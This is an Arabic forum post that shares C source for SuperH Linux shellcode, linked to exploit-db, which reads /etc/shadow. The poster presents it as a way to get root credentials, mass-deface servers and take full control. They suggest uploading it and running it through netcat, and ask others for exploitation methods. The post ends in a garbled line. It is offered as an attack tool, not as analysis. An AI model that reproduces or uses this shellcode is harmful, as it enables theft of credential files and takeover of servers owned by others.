السلام عليكم شباب
تغرة قوية ان شاء الله لقراءة ملف shadow لي يحتوي على
يوزر وباسوورد root السرفر ممكن بقراءته عمل ماس ديفايس للسرفر
والتحكم الكامل بالسرفر :( :surprised:
التغرة
http://www.exploit-db.com/exploits/17432/
بسيط جدا الكود السورس :
#include <stdio.h>
#include <string.h>
char *SC = "\x17\xe3\x4a\x24\x02\xc3\x0f\xe3\x05\xc7\x03"
"\x64\x57\xe8\x05\xe9\x87\x09\x1a\x05\x03\x75"
"\x02\xc3\x3a\x23\x01\xe3\x4a\x24\x02\xc3\x2f"
"\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
}
ما اعرف ايش هو دلك الشيل كود
المهم التغرة تعمل ب Debian-sh4 2.6.32-5-sh7751r
ساجرب ان شاء الله ربما ترفع الملف بصيغة .c وتشغله بالنت كات
ويتم عرض ملف shadow ساجرب ان شاء وارد
من يعرف طريقة الاستغلال يقول :d:yes::yes:
:diablo::diablo::diablo::diablo:
jyvm grvhxm lgt etcLshadow []d]m